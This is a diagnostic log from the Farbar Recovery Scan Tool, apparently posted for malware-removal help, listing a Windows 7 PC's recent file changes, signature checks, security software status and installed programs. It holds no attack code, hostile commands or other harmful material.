2014-10-28 22:22 - 2014-10-28 22:55 - 00000000 ____D () C:\Users\ADH.Heathman-PC\Desktop\FRST64
2014-10-28 22:04 - 2014-10-28 22:55 - 00000000 ____D () C:\FRST
2014-10-27 17:51 - 2014-10-27 17:54 - 120407800 _____ (Microsoft Corporation) C:\Users\ADH.Heathman-PC\Downloads\msert.exe
2014-10-24 18:49 - 2014-10-28 21:21 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-20 12:22 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-20 12:22 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-19 16:51 - 2013-10-01 21:22 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\Drivers\TsUsbFlt.sys
2014-10-19 16:51 - 2013-10-01 21:11 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-19 16:51 - 2013-10-01 21:08 - 00012800 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-19 16:51 - 2013-10-01 20:48 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\MsRdpWebAccess.dll
2014-10-19 16:51 - 2013-10-01 20:48 - 00018944 _____ (Microsoft Corporation) C:\windows\system32\wksprtPS.dll
2014-10-19 16:51 - 2013-10-01 20:29 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\tsgqec.dll
2014-10-19 16:51 - 2013-10-01 20:10 - 00044544 _____ (Microsoft Corporation) C:\windows\system32\TsUsbGDCoInstaller.dll
2014-10-19 16:51 - 2013-10-01 19:15 - 01057280 _____ (Microsoft Corporation) C:\windows\system32\rdvidcrl.dll
2014-10-19 16:51 - 2013-10-01 19:14 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\MsRdpWebAccess.dll
2014-10-19 16:51 - 2013-10-01 19:14 - 00017920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wksprtPS.dll
2014-10-19 16:51 - 2013-10-01 19:08 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\TSWbPrxy.exe
2014-10-19 16:51 - 2013-10-01 19:01 - 00420864 _____ (Microsoft Corporation) C:\windows\system32\wksprt.exe
2014-10-19 16:51 - 2013-10-01 18:58 - 00053248 _____ (Microsoft Corporation) C:\windows\SysWOW64\tsgqec.dll
2014-10-19 16:51 - 2013-10-01 18:31 - 01147392 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-19 16:51 - 2013-10-01 18:08 - 00855552 _____ (Microsoft Corporation) C:\windows\SysWOW64\rdvidcrl.dll
2014-10-19 16:51 - 2013-10-01 17:34 - 01068544 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-19 16:02 - 2014-10-19 16:02 - 00000000 ____D () C:\windows\System32\Tasks\Norton 360
2014-10-19 16:00 - 2014-10-19 16:00 - 00177752 _____ (Symantec Corporation) C:\windows\system32\Drivers\SYMEVENT64x86.SYS
2014-10-19 16:00 - 2014-10-19 16:00 - 00008222 _____ () C:\windows\system32\Drivers\SYMEVENT64x86.CAT
2014-10-19 16:00 - 2014-10-19 16:00 - 00002402 _____ () C:\Users\Public\Desktop\Norton 360.lnk
2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ____D () C:\Program Files (x86)\Norton 360
2014-10-19 15:56 - 2014-10-19 15:56 - 01021968 _____ (Symantec Corporation) C:\Users\Heathman\Downloads\NortonN360Downloader.exe
2014-10-19 15:49 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll
2014-10-19 15:49 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll
2014-10-19 15:48 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-19 15:48 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-19 15:48 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-19 15:48 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-19 15:48 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-19 15:48 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-19 15:48 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-19 15:48 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-19 15:48 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-19 15:48 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-19 15:48 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-19 15:48 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-10-19 15:48 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-10-19 15:48 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-19 15:48 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-19 15:48 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls
2014-10-19 15:48 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls
2014-10-19 15:48 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-19 15:47 - 2014-10-19 15:47 - 00896048 _____ () C:\Users\ADH.Heathman-PC\Downloads\Norton_Removal_Tool.exe
2014-10-19 15:45 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-19 15:45 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-19 15:45 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-19 15:45 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-19 15:45 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-19 15:45 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-19 15:45 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-19 15:45 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-19 15:45 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-19 15:45 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-19 15:45 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-19 15:45 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\windows\system32\RegisterIEPKEYs.exe
2014-10-19 15:45 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-19 15:45 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-19 15:45 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-17 12:57 - 2014-10-17 12:58 - 127289600 _____ (Microsoft Corporation) C:\Users\Heathman\Downloads\msert (1).exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 22:39 - 2012-10-13 15:28 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\MotoCast
2014-10-28 22:38 - 2014-05-17 20:38 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-28 22:38 - 2012-11-01 06:39 - 00000000 ____D () C:\Users\Heathman\.gstreamer-0.10
2014-10-28 22:27 - 2013-10-21 09:40 - 00003950 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}
2014-10-28 22:24 - 2012-04-01 20:34 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-10-28 22:23 - 2012-10-11 20:07 - 00000920 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job
2014-10-28 22:05 - 2012-03-24 16:17 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 22:03 - 2009-07-14 00:13 - 00006214 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-28 21:48 - 2014-05-17 17:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-28 21:20 - 2012-10-13 15:30 - 00000000 ____D () C:\Temp
2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-28 21:08 - 2012-03-24 16:01 - 01373568 _____ () C:\windows\WindowsUpdate.log
2014-10-28 21:04 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-28 21:04 - 2009-07-13 23:51 - 00072697 _____ () C:\windows\setupact.log
2014-10-28 20:52 - 2010-11-20 22:47 - 03730694 _____ () C:\windows\PFRO.log
2014-10-27 18:16 - 2014-09-03 19:53 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-10-27 06:23 - 2012-10-11 20:07 - 00000868 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job
2014-10-25 14:00 - 2012-03-24 16:17 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-25 14:00 - 2012-03-24 16:17 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-25 14:00 - 2012-03-24 16:17 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-24 18:27 - 2012-08-11 10:41 - 00000000 ____D () C:\Users\Heathman\AppData\Local\CrashDumps
2014-10-24 18:19 - 2012-11-06 22:39 - 00000000 ____D () C:\Users\Heathman\Documents\My Kindle Content
2014-10-22 06:18 - 2012-10-11 20:07 - 00003896 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA
2014-10-22 06:18 - 2012-10-11 20:07 - 00003500 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core
2014-10-21 11:15 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache
2014-10-21 10:22 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF
2014-10-20 19:34 - 2014-05-17 17:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-20 19:34 - 2013-07-29 17:47 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 16:58 - 2009-07-13 23:45 - 00434912 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-19 16:56 - 2014-05-06 06:24 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-19 16:54 - 2012-03-24 14:10 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-19 16:48 - 2013-07-21 08:54 - 00000000 ____D () C:\windows\system32\MRT
2014-10-19 16:44 - 2012-03-28 19:04 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-19 16:08 - 2013-07-23 18:36 - 00000000 ____D () C:\Users\Heathman\Desktop\Norton
2014-10-19 16:08 - 2012-03-24 16:16 - 00000000 ____D () C:\ProgramData\Norton
2014-10-19 16:08 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2014-10-19 16:00 - 2014-06-17 20:27 - 00003206 _____ () C:\windows\System32\Tasks\Norton WSC Integration
2014-10-19 16:00 - 2014-06-17 20:27 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared
2014-10-19 15:57 - 2014-06-17 20:14 - 00038912 ___SH () C:\Users\Heathman\Desktop\Thumbs.db
2014-10-19 15:56 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Public\Downloads\Norton
2014-10-19 15:48 - 2013-12-18 07:40 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\CrashDumps
2014-10-19 15:44 - 2013-12-18 07:38 - 00000000 ____D () C:\Users\ADH.Heathman-PC
2014-10-19 15:39 - 2012-03-25 20:16 - 00002030 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-10-19 15:39 - 2011-11-21 23:32 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-19 15:38 - 2012-05-16 00:06 - 00000000 ____D () C:\Users\UpdatusUser.Heathman-PC
2014-10-19 15:36 - 2012-03-24 12:43 - 00000000 ____D () C:\Users\Heathman
2014-10-19 15:33 - 2014-09-03 19:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-19 15:33 - 2014-06-17 20:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64
2014-10-19 15:33 - 2012-04-01 19:39 - 00000000 ____D () C:\Users\Guest
2014-10-19 15:33 - 2012-03-24 16:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2014-10-19 15:33 - 2011-11-21 23:31 - 00000000 ____D () C:\windows\SysWOW64\Macromed
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\Dism
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\AppCompat
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-10-19 15:20 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\registration
2014-10-19 15:16 - 2012-06-27 20:07 - 00000000 ____D () C:\Users\Heathman\Documents\TomTom
2014-10-19 14:56 - 2012-03-25 20:11 - 00000000 ____D () C:\Users\Heathman\AppData\Local\Adobe
2014-10-03 06:45 - 2014-02-18 21:09 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\Adobe
2014-10-01 11:11 - 2014-05-17 17:12 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-01 11:11 - 2014-05-17 17:12 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-01 11:11 - 2013-07-29 17:47 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys

Some content of TEMP:
====================
C:\Users\Heathman\AppData\Local\Temp\ose00000.exe
C:\Users\Heathman\AppData\Local\Temp\sqlite-3.6.20-sqlitejdbc.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-28 21:55

==================== End Of Log ============================

 

 

Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014 01
Ran by ADH at 2014-10-28 22:55:31
Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 Premier Edition (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton 360 Premier Edition (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton 360 Premier Edition (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Amazing Adventures The Forgotten Dynasty (HKLM-x32\...\Amazing Adventures The Forgotten Dynasty) (Version:  - PopCap Games)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Big City Adventure San Francisco (HKLM-x32\...\Big City Adventure San Francisco_is1) (Version:  - Best Buy)
Big City Adventure Sydney (HKLM-x32\...\Big City Adventure Sydney_is1) (Version:  - Best Buy)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Castle - Never Judge a Book by Its Cover (HKLM-x32\...\Castle - Never Judge a Book by Its Cover) (Version: 1.0 - GameMill Entertainment)
ContentHD (x32 Version: 1.00.0002 - Corel Corporation) Hidden
Contents (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Corel Digital Studio SE (HKLM-x32\...\_{E185BD5C-0E10-479F-AF44-63D3A068446A}) (Version: 1.5.10.332 - Corel Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DeviceIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
DFPro (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Escape The Emerald Star (HKLM-x32\...\Escape The Emerald Star) (Version:  - PopCap Games)
Escape Whisper Valley (HKLM-x32\...\Escape Whisper Valley) (Version:  - PopCap Games)
FATE - The Traitor Soul (x32 Version: 2.2.0.95 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hoyle Card Games Classic (HKLM-x32\...\Hoyle Card Games Classic) (Version:  - )
Hoyle Casino Classic (HKLM-x32\...\Hoyle Casino Classic) (Version:  - )
ICA (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Intel PROSet Wireless (Version:  - ) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2430 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{3C41721F-AF0F-4086-AA1C-4C7F29076228}) (Version: 14.01.1000 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
Intel® WiDi (HKLM-x32\...\{7257132D-7F65-41E6-A90F-43BF6099461A}) (Version: 2.1.42.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version:  - )
IPM_OEM (x32 Version: 1.53 - Corel Corporation) Hidden
ISCOM (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.4.1 - Sun Microsystems, Inc.) Hidden
Java 6 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216025FF}) (Version: 6.0.250 - Oracle)
Jewel Quest Mysteries Curse of the Emerald Tear (HKLM-x32\...\{246BBF3E-3CB6-4269-9728-904C54CC1D4A}) (Version: 1.00.0000 - Valusoft)
Jewel Quest Mysteries The Seventh Gate (HKLM-x32\...\{BD40253B-EFE2-4610-9AA5-F3317DB970BE}) (Version: 1.00.0000 - Valusoft)
